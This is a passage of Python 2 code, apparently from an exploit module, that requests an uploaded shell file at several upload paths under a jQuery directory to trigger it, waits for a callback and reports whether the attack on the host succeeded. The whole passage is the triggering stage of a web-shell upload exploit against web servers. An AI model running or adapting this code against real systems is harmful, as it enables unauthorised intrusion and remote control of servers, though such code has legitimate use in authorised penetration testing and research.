= 0 if found_path: UA.clearHeaders() for upload_path in self.upload_paths: test_path = jquery_path + upload_path + fname_shell logging.info("Triggering our uploaded callback: {}".format( useragentstring + test_path)) UA.GET(test_path, noresponse=True) for i in xrange(0, 5): #wait five seconds for callback time.sleep(1) ret = self.ISucceeded() if ret: break if ret: break if ret: self.setInfo("%s attacking %s:%d - done (success!)" % (NAME, self.host, self.port)) else: self.setInfo("%s attacking %s:%d - done (failed)" % (NAME, self.host, self.port)) return ret